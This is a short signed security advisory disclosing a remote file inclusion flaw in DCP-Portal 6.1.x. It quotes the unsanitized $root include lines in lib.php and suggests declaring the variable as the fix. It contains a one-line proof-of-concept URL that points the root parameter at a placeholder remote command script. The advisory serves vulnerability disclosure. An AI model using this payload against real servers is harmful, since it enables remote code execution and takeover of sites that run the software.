-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ----------------------------------------------------- Advisory id: FSA:013 Author: Federico Fazzi Date: 12/06/2006, 9:31 Sinthesis: DCP-Portal 6.1.x, Remote command execution Type: high Product: http://www.dcp-portal.org/ Patch: unavailable - ----------------------------------------------------- 1) Description: Error occured in lib.php, line 4/7: include ("$root/library/lib_nav.php"); include ("$root/library/lib_mods.php"); include ("$root/library/lib_admin.php"); include ("$root/library/lib_3rd.php"); variable $root not sanitized (declare). 2) Proof of concept: http://example/[dp_path]/library/lib.php?root=[cmd_url] 3) Solution: declare $root variable on this file. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFEjRoI/yZYyBsK/94RAmqjAJ92aaKdht7NXZRO6ewWbhtWQI5w3QCfRYsL rvFtJfviRWKAPRcoZfj0rSg= =VXm6 -----END PGP SIGNATURE-----
